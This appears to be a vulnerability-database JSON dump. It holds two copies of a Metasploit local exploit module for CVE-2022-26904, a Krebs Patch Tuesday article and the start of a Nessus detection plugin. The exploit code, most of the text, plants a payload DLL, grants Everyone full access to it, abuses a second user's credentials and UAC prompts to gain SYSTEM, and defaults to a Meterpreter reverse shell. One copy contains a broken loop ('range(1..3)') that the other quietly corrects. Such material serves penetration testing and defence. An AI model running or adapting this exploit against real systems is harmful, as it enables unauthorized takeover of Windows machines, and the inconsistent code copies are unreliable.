processes\n # by name or PIDs as library functions for these session types.\n cmd_exec('taskkill /IM \"consent.exe\" /F')\n sleep(5)\n cmd_exec('taskkill /IM \"narrator.exe\" /F')\n cmd_exec('taskkill /IM \"narratorquickstart.exe\" /F')\n cmd_exec('taskkill /IM \"msiexec.exe\" /F')\n end\n\n rm_rf('C:\\\\Windows\\\\System32\\\\Narrator.exe.local')\n for _i in 1..3 # Ruby has no Kernel#range; iterate the Range literal directly\n rm_rf('C:\\\\Users\\\\TEMP') # Try deleting this 3 times just to be sure.\n end\n @session = old_session\n super\n end\nend\n", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2022_26904_superprofile.rb", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2023-06-14T15:38:05", "description": "The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of the junctions it tries to link together. Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user. Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it as CVE-2022-26904.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T00:00:00", "type": "zdt", "title": "Windows User Profile Service Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2022-04-12T00:00:00", "id": "1337DAY-ID-37625", "href": "https://0day.today/exploit/description/37625", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'User Profile Arbitrary Junction Creation Local Privilege Elevation',\n 'Description' => %q{\n The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability\n in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of\n the junctions it tries to link together.\n\n Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a\n UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.\n\n Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as\n CVE-2022-21919, however both patches were found to be insufficient. 
This bug is a patch bypass for\n CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it\n as CVE-2022-26904.\n\n It is important to note that the credentials supplied for the second user to log in as in this exploit must be\n those of a normal non-admin user and these credentials must also corralate with a user who has already logged in\n at least once before. Additionally the current user running the exploit must have UAC set to the highest level,\n aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that\n \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances\n where this setting has been changed either manually or as part of the installation process.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'KLINIX5', # Aka Abdelhamid Naceri. Original PoC w Patch Bypass\n 'Grant Willcox' # Metasploit module + Tweaks to PoC\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows 11', { 'Arch' => ARCH_X64 } ]\n ],\n 'References' => [\n ['CVE', '2022-26904'],\n ['URL', 'https://github.com/rmusser01/SuperProfile'], # Original link was at https://github.com/klinix5/SuperProfile/ but was taken down. 
This is a backup.\n ['URL', 'https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html'], # Original blog post\n ['URL', 'https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx'] # Discussion of previous iterations of this bug providing insight into patched functionality.\n ],\n 'DisclosureDate' => '2022-03-17', # Date MSRC supplied CVE number, bug is not patched atm.\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE, ],\n 'Reliability' => [ REPEATABLE_SESSION ], # Will need to double check this as this may require some updates to the code to get it to the point where it can be used repetitively.\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS, AUDIO_EFFECTS ]\n },\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 300\n },\n 'AKA' => [ 'SuperProfile' ]\n }\n )\n )\n\n register_options([\n OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),\n OptString.new('LOGINDOMAIN', [true, 'Domain that the LOGINUSER belongs to. 
Ensures we log into the right domain.', '.']),\n OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])\n ])\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /(7|8|8\\.1|10|11|2008|2012|2016|2019|2022|1803|1903|1909|2004)/\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n print_status('Checking if PromptOnSecureDesktop mitigation applied...')\n reg_key = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'\n reg_val = 'PromptOnSecureDesktop'\n begin\n root_key, base_key = @session.sys.registry.splitkey(reg_key)\n value = @session.sys.registry.query_value_direct(root_key, base_key, reg_val)\n rescue Rex::Post::Meterpreter::RequestError => e\n return CheckCode::Unknown(\"Was not able to retrieve the PromptOnSecureDesktop value. 
Error was #{e}\")\n end\n\n if value.data == 0\n return CheckCode::Safe('PromptOnSecureDesktop is set to 0, mitigation applied!')\n elsif value.data == 1\n print_good('PromptOnSecureDesktop is set to 1, should be safe to proceed!')\n else\n return CheckCode::Unknown(\"PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?\")\n end\n\n _major, _minor, build, revision, _branch = file_version('C:\\\\Windows\\\\System32\\\\ntdll.dll')\n major_minor_version = sysinfo_value.match(/\\((\\d{1,2}\\.\\d)/)\n if major_minor_version.nil?\n return CheckCode::Unknown(\"Could not retrieve the major n minor version of the target's build number!\")\n end\n\n major_minor_version = major_minor_version[1]\n build_num = \"#{major_minor_version}.#{build}.#{revision}\"\n\n build_num_gemversion = Rex::Version.new(build_num)\n\n # Build numbers taken from https://www.gaijin.at/en/infos/windows-version-numbers and from\n # https://en.wikipedia.org/wiki/Windows_11_version_history and https://en.wikipedia.org/wiki/Windows_10_version_history\n if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) # Windows 11\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) # Windows Server 2022\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) # Windows 10 21H2\n return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) # Windows 10 21H1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) # Windows 10 20H2 / Windows Server, Version 20H2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')\n elsif (build_num_gemversion >= 
Rex::Version.new('10.0.19041.0')) # Windows 10 v2004 / Windows Server v2004\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v2004 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) # Windows 10 v1909 / Windows Server v1909\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) # Windows 10 v1903\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) # Windows 10 v1809 / Windows Server 2019 v1809\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) # Windows 10 v1803\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) # Windows 10 v1709\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) # Windows 10 v1703\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) # Windows 10 v1607 / Windows Server 2016 v1607\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) # Windows 10 v1511\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) # Windows 10 v1507\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build 
detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) # Windows 8.1/Windows Server 2012 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) # Windows 8/Windows Server 2012\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) # Windows 7 SP1/Windows Server 2008 R2 SP1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7600.0')) # Windows 7/Windows Server 2008 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.0.6002.0')) # Windows Server 2008 SP2\n target_not_presently_supported\n return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check_target_is_running_supported_windows_version\n if !sysinfo['OS'].include?('Windows')\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif !sysinfo['OS'].include?('Windows 10') && !sysinfo['OS'].include?('Windows 11') && !sysinfo['OS'].include?('Windows Server 2022')\n fail_with(Failure::NoTarget, 'Target is running Windows, its not a version this module supports! 
Bailing...')\n end\n end\n\n def exploit\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n check_target_is_running_supported_windows_version\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\#{Rex::Text.rand_text_alpha(6..13)}.dll\"\n print_status(\"Writing malicious DLL to #{malicious_dll_location}\")\n write_file(malicious_dll_location, payload_dll)\n\n print_status('Marking DLL as full access for Everyone so that there are no access issues as the secondary user...')\n cmd_exec(\"icacls #{malicious_dll_location} /grant Everyone:(F)\")\n register_file_for_cleanup(malicious_dll_location)\n\n # Register the directories we create for cleanup\n register_dir_for_cleanup('C:\\\\Windows\\\\System32\\\\Narrator.exe.Local')\n register_dir_for_cleanup('C:\\\\Users\\\\TEMP')\n\n # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-26904', 'CVE-2022-26904.dll')\n library_path = ::File.expand_path(library_path)\n\n dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s\n\n @session_obtained_bool = false\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation, and the credentials for the second user.\n execute_dll(library_path, dll_info_parameter)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n 
print_warning(\"Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:\")\n print_warning('taskkill /IM \"consent.exe\" /F || taskkill /IM \"narrator.exe\" /F || taskkill /IM \"narratorquickstart.exe\" /F || taskkill /IM \"msiexec.exe\" || rmdir /q /s C:\\Users\\TEMP || rmdir /q /s C:\\Windows\\System32\\Narrator.exe.local')\n print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')\n\n print_status('Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.')\n print_status('If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.')\n sleep(60)\n if (@session_obtained_bool == false)\n # Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself\n # triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.\n begin\n cmd_exec('UserAccountControlSettings.exe')\n rescue Rex::TimeoutError\n print_warning('Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!')\n end\n end\n end\n\n def on_new_session(new_session)\n @session_obtained_bool = true\n old_session = @session\n @session = new_session\n if new_session.type == 'meterpreter'\n consent_pids = pidof('consent.exe')\n for id in consent_pids\n @session.sys.process.kill(id)\n end\n sleep(5) # Needed as otherwise later folder deletion calls sometimes fail, and additional Narrator.exe processes\n # can sometimes spawn a few seconds after we close consent.exe so we want to grab all of them at once.\n narrator_pids = pidof('Narrator.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('NarratorQuickStart.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n 
narrator_pids = pidof('msiexec.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n else\n # If it is another session type such as shell or PowerShell we will need to execute the command\n # normally using cmd_exec() to cleanup, as it doesn't seem we have a built in option to kill processes\n # by name or PIDs as library functions for these session types.\n cmd_exec('taskkill /IM \"consent.exe\" /F')\n sleep(5)\n cmd_exec('taskkill /IM \"narrator.exe\" /F')\n cmd_exec('taskkill /IM \"narratorquickstart.exe\" /F')\n cmd_exec('taskkill /IM \"msiexec.exe\" /F')\n end\n\n rm_rf('C:\\\\Windows\\\\System32\\\\Narrator.exe.local')\n for _i in range(1..3)\n rm_rf('C:\\\\Users\\\\TEMP') # Try deleting this 3 times just to be sure.\n end\n @session = old_session\n super\n end\nend\n", "sourceHref": "https://0day.today/exploit/37625", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2021-12-23T19:27:26", "description": "**Microsoft**, **Adobe**, and **Google** all issued security updates to their products today. The Microsoft patches include six previously disclosed security flaws, and one that is already being actively exploited. But this month's Patch Tuesday is overshadowed by the "**Log4Shell**" 0-day exploit in a popular **Java** library that web server administrators are now racing to find and patch amid widespread exploitation of the flaw.\n\n\n\nLog4Shell is the name picked for a critical flaw disclosed Dec. 9 in the popular logging library for Java called "**log4j**," which is included in a huge number of Java applications. 
Publicly released exploit code allows an attacker to force a server running a vulnerable log4j library to execute commands, such as downloading malicious software or opening a backdoor connection to the server.\n\nAccording to researchers at **Lunasec**, many, many services are vulnerable to this exploit.\n\n"Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable," Lunasec [wrote](<https://www.lunasec.io/docs/blog/log4j-zero-day/>). "Anybody using Apache Struts is likely vulnerable. We've seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach. An extensive list of responses from impacted organizations has been compiled [here](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>)."\n\n"If you run a server built on open-source software, there\u2019s a good chance you are impacted by this vulnerability," said **Dustin Childs** of Trend Micro's Zero Day Initiative. "Check with all the vendors in your enterprise to see if they are impacted and what patches are available."\n\nPart of the difficulty in patching against the Log4Shell attack is identifying all of the vulnerable web applications, said **Johannes Ullrich**, an incident handler and blogger for the **SANS Internet Storm Center**. "Log4Shell will continue to haunt us for years to come. Dealing with log4shell will be a marathon," Ullrich said. "Treat it as such." 
SANS has [a good walk-through](<https://isc.sans.edu/forums/diary/RCE+in+log4j+Log4Shell+or+how+things+can+get+bad+quickly/28120/>) of how simple yet powerful the exploit can be.\n\n**John Hultquist**, vice president of intelligence analysis at **Mandiant**, said the company has seen Chinese and Iranian state actors leveraging the log4j vulnerability, and that the Iranian actors are particularly aggressive, having taken part in ransomware operations that may be primarily carried out for disruptive purposes rather than financial gain.\n\n"We anticipate other state actors are doing so as well, or preparing to," Hultquist said. "We believe these actors will work quickly to create footholds in desirable networks for follow-on activity, which may last for some time. In some cases, they will work from a wish list of targets that existed long before this vulnerability was public knowledge. In other cases, desirable targets may be selected after broad targeting."\n\nResearcher **Kevin Beaumont** had a more lighthearted take on Log4Shell [via Twitter](<https://twitter.com/GossiTheDog/status/1470787395805192199>):\n\n"Basically the perfect ending to cybersecurity in 2021 is a 90s style Java vulnerability in an open source module, written by two volunteers with no funding, used by large cybersecurity vendors, undetected until Minecraft chat got pwned, where nobody knows how to respond properly."\n\nThe** Cybersecurity and Infrastructure Security Agency** (CISA) has joined with the **FBI**, **National Security Agency** (NSA) and partners abroad in publishing [an advisory](<https://www.cisa.gov/uscert/ncas/alerts/aa21-356a>) to help organizations mitigate Log4Shell and other Log4j-related vulnerabilities.\n\nA half-dozen of the vulnerabilities addressed by Microsoft today earned its most dire "critical" rating, meaning malware or miscreants could exploit the flaws to gain complete, remote control over a vulnerable Windows system with little or no help from users.\n\nThe Windows 
flaw already seeing active exploitation is [CVE-2021-43890](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890>), which is a "spoofing" bug in the **Windows AppX installer** on **Windows 10.** Microsoft says it is aware of attempts to exploit this flaw using specially crafted packages to implant malware families like [Emotet](<https://krebsonsecurity.com/?s=Emotet>), [Trickbot](<https://krebsonsecurity.com/?s=trickbot>), and [BazaLoader](<https://www.proofpoint.com/us/blog/threat-insight/bazaflix-bazaloader-fakes-movie-streaming-service>).\n\n**Kevin Breen**, director of threat research for Immersive Labs, said [CVE-2021-43905](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43905>) stands out of this month's patch batch.\n\n"Not only for its high [CVSS score](<https://www.techtarget.com/searchsecurity/definition/CVSS-Common-Vulnerability-Scoring-System>) of 9.6, but also because it\u2019s noted as 'exploitation more likely'," Breen observed.\n\nMicrosoft also patched [CVE-2021-43883](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883>), an elevation of privilege vulnerability in Windows Installer.\n\n"This appears to be a fix for a patch bypass of [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>), another elevation of privilege vulnerability in Windows Installer that was reportedly fixed in November," **Satnam Narang** of Tenable points out. "However, researchers discovered that fix was incomplete, and a proof-of-concept was made public late last month."\n\nGoogle issued five security fixes for **Chrome**, including one rated critical and three others with high severity. If you\u2019re browsing with Chrome, keep a lookout for when you see an \u201cUpdate\u201d tab appear to the right of the address bar. If it\u2019s been a while since you closed the browser, you might see the Update button turn from green to orange and then red. 
Green means an update has been available for two days; orange means four days have elapsed, and red means your browser is a week or more behind on important updates. Completely close and restart the browser to install any pending updates.\n\nAlso, Adobe issued patches to correct more than 60 security flaws in [a slew of products,](<https://helpx.adobe.com/security.html>) including Adobe Audition, Lightroom, Media Encoder, Premiere Pro, Prelude, Dimension, After Effects, Photoshop, Connect, Experience Manager and Premiere Rush.\n\nStandard disclaimer: Before you update Windows, _please_ make sure you have backed up your system and/or important files. It\u2019s not uncommon for a Windows update package to hose one\u2019s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.\n\nSo do yourself a favor and backup before installing any patches. Windows 10 even has some [built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nIf you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a decent chance other readers have experienced the same and may chime in here with useful tips.\n\nAdditional reading:\n\n[SANS ISC listing](<https://isc.sans.edu/forums/diary/Microsoft+December+2021+Patch+Tuesday/28132/>) of each Microsoft vulnerability patched today, indexed by severity and affected component.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": 
{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-12-14T22:23:44", "type": "krebs", "title": "Microsoft Patch Tuesday, December 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-43883", "CVE-2021-43890", "CVE-2021-43905"], "modified": "2021-12-14T22:23:44", "id": "KREBS:4CBEC9501222521F7CCF1D5ECAD51297", "href": "https://krebsonsecurity.com/2021/12/microsoft-patch-tuesday-december-2021-edition/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-18T15:32:36", "description": "The remote Windows host is missing security update 5005095 or cumulative update 5005090. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-34533, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484, CVE-2021-36927)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005095: Windows Server 2008 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-36927", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005095.NASL", "href": "https://www.tenable.com/plugins/nessus/152425", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152425);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-36927\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005095\");\n script_xref(name:\"MSKB\", value:\"5005090\");\n script_xref(name:\"MSFT\", value:\"MS21-5005095\");\n script_xref(name:\"MSFT\", value:\"MS21-5005090\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005095: Windows Server 2008 Security Update (August 2021)\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005095\nor cumulative update 5005090. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-34533, CVE-2021-36936, CVE-2021-36937,\n CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484,\n CVE-2021-36927)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005095-security-only-update-a324fdbb-ce90-4c4d-8d9d-e9f2f2a57e0e\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?de72daa6\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005090-monthly-rollup-8feea9cd-25f9-41ef-b8e1-815211dc4e6c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?910509c6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005095 or Cumulative Update KB5005090.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n 